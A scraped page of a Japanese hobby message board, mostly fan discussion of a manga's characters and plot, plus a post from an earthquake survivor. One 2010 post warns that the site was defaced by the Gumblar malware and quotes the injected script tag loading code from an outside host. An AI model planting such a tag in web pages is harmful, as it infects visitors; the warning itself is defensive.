teacup. [ 掲示板 ] [ 掲示板作成 ] [ 有料掲示板 ] [ ブログ ]

 投稿者
  題名
  内容 入力補助 youtubeの<IFRAME>タグが利用可能です。(詳細)
    
 URL
[ ケータイで使う ] [ BBSティッカー ] [ 書込み通知 ] [ 検索 ]

スレッド一覧

  1. 10000000(0)
スレッド一覧(全1)  他のスレッドを探す 

*掲示板をお持ちでない方へ、まずは掲示板を作成しましょう。無料掲示板作成


おひさしぶりです

 投稿者:Zell  投稿日:2011年 4月16日(土)17時49分20秒
  Zellといいます。以前はスポールという名前で、武装錬金について語るのが楽しみでした。
ここに来なくなってから、様々なジャンルの世界の様々な方々にお世話になりながら、今日まで生きてました^^

自分は先月の大震災で壊滅的被害を受けた街、陸前高田に住んでいました。
家も被害を受け、友達を数人亡くしましたが、自分は引っ越しのために無事でした。その無事を報告するため、こうしてお世話になったサイト様を巡回して書き込んでいます。
ほかの場所でも、同じような報告をさせていただいております。スルーで構いませんので、「あ、生きてたんだ」くらいに思ってていただいて結構でございます。では^^
 
 

★緊急 ホームページにウイルスへのリンク  閲覧した方が感染します

 投稿者:novirusメール  投稿日:2010年 8月 4日(水)09時49分23秒
  ホームページが改ざんされウイルスへのリンクが埋め込まれています。新聞紙上で賑わしているガンブラー(gumblar)ウイルスと呼ばれる物です。この改ざんの根本原因は、このHPを更新する際に利用するFTPを行っているパソコンがウイルスに感染し、FTPのIDとパスワードを外部に盗まれることから発生します。下記のサイトにそのメカニズム対処法が書かれていますので早急に対処をすることをお勧めいたします。 https://www.ccc.go.jp/detail/web/index.html#2 <確認した改ざんページ> alive.s41.xrea.com/ <不正スクリプト> BODYタグの前 <script src=http://sepahan-e.com/host/DataSet10.php ></script>
<script src=http://sepahan-e.com/host/DataSet10.php >
 

運動神経機能特化

 投稿者:那智  投稿日:2009年 8月14日(金)12時37分39秒
  狂経脈の下位版?
感覚神経はいじってないので「血の一滴一滴を見極め…」ということは出来ませんが
龍鳴閃でどうこうなるわけでもない、と。
そう考えると単に下位版とも言えないかも知れません。

相手の行動に対する反応は普通、筋力も普通。
「速さ」という点で期待できるのは脳から骨格筋までの伝達速度が速い、ということだけですかね。

覚醒したかと思えばいきなり弱点が露呈。
むしろ最大出力で電気流して感電させる?どうなるんでしょうか。


単行本の方はしばらく大学の方が忙しかったのでちょっと読めてません。
今は一段落付いたので読みたいと思います。
 

>ファンキー

 投稿者:緋村  投稿日:2009年 7月20日(月)02時45分6秒
  >那智さん
自分も八目っぽいのを想像してたので少しホッとしました正直。
えらい強いですねリッパー。しかし気持ち悪い・・・
ヒューリーは覚醒するっぽいのでどんな戦いになるのか楽しみです。
巻頭カラーの構図がカッコよくてかなり良かったです。

2巻買いましたか?ようやくって感じですねほんと。
ライナーノーツはやっぱり面白いです。まだ増ページ諦めてないみたいで
どうしても期待してしまいますね・・・。
3巻ももうすぐ出るので楽しみです。表紙誰になるんでしょう。
 

ファンキー

 投稿者:那智  投稿日:2009年 6月22日(月)22時10分1秒
  リッパーが予想以上にファンキーでした。
マスクだったわけですが、あの口元から八ツ目みたいな感じかと思ってました。
むしろ番神?
そろそろヒューリーの能力が明らかになってくるんでしょうね。

SQ2に関しては全く知りませんでした。
どこかに置いてあったら眺めてみたいと思います。
 

>と、飛んだ

 投稿者:緋村  投稿日:2009年 6月16日(火)20時33分6秒
  >那智さん
異常な肺機能と言っても空飛んだり腕からエアブレード出したり
チートもいいとこですね。リッパー。リリィやスカベンジャーも
それぐらい凄いんでしょうか。特に後者は未だ本体シルエットのみですし。
とりあえずリッパーがカッコよすぎてよかったです。
口裂けはマスクだったんですね。安心しました。
ヒューリーとのバトルがどのぐらい盛り上がるか楽しみです。
まだ全然能力わかってないですしヒューリーも。
エルムはどう絡んでくるんでしょうかね。
アシュヒトは終わってから来ると思いますが・・・。

2巻と3巻ようやく出るみたいですね。しかも連続でとか嬉しいです。
武井先生とのコラボとか明後日発売のSQ2で小説載るとか
動きが活発になってくれてよかったです。しかも来月は巻頭カラー!
スケジュールキツいとかで9月号で休載とか減ページとか無い事を祈るばかりですね。
 

と、飛んだ

 投稿者:那智  投稿日:2009年 5月28日(木)21時34分0秒
  空飛ぶとは思いませんでした。
切断の描写も圧縮空気?を手から出して切ってるってことですかね。

「強化」になっているのは気付きませんでした。誤植?
ヒューリーの荒れ具合を考えるとvsヒューリーになるのが妥当でしょうか。
更に何かが「特化」しているとすると厄介そう…
ヒューリー&エルムで相手をするとすれば丁度いいのかもしれませんが、
最初にそんな強そうな(2対1で丁度いいような)敵をぶつけてしまうのも展開としてどうかと思いますし。

ピーベリー&アシュヒトの方も危険な感じがしますし、どうなるのか非常に楽しみです。
 

>鬱展開

 投稿者:緋村  投稿日:2009年 5月15日(金)02時08分52秒
  >那智さん
ヒューリーの能力は何なんでしょうかねほんとに。
何か瞬間移動というか縮地のような描写がありましたが・・・
どうやらリッパーとのバトルがこの後来そうですし
すぐに判明しそうですね。きっと隠し機能とかもあるんだと思いますが。

リッパーの能力が呼吸機能"強化"になってるんですが究極8体って
特化型のはずですよね。誤植なのか違う特化機能が備わっているのか・・・
スカベンジャーやリリィよりは実践的なタイプなのは間違いないと思います。

ヴァイオレットにメアリーにヒューリーにエルム。更にリッパーに
アシュヒトやピーベリーも向かってるようですがどんな展開になるんでしょうかね。
ついでに2巻3巻もストック余裕で貯まってるんで早いとこお願いしたいですね・・・
 

鬱展開

 投稿者:那智  投稿日:2009年 4月18日(土)23時18分22秒
  子供全滅とは。回想終わってのアレは効きました。
脳みその奴は強キャラかと思いましたがあっさり。
ヒューリーも特化型のようですが、神経強化とかですかね。電極が特殊とか。

母親登場でどうなるんですかねぇ?
襲ってきた母親を目の前で壊されて(殺されて)…とかあるかもしれないですね。
 

>エーデル

 投稿者:緋村  投稿日:2009年 4月11日(土)01時24分55秒
  >那智さん
早速ヒューリーがフランケンバレっぽい展開ですね。
本当に現在進行形で死にまくりですね。黒いというか鬱展開というか。
エーデルもといヴァイオレットに幸せは訪れるんでしょうか。
次号母親登場で発狂とかしたりして・・・レイスに見つかれば殺されそうな
勢いですし。エーデルに続きヴァイオレットまで死んだら
ヒューリーもぶっ壊れそうですよね。

リッパーがそろそろ送り込まれそうですがどんなヤツか気になりますね。
今回の下っ端があまりにもやられキャラって感じだったし
気合入れたキャラが出てきてくれれば嬉しいです。
究極8体結構出ちゃってますけど何かまだまだ伯爵編的なものは
終わるまで時間かかりそうですね。
最後まで描ける事を願ってます。ジョン=ドゥも早く見たいです。
 

レンタル掲示板
/12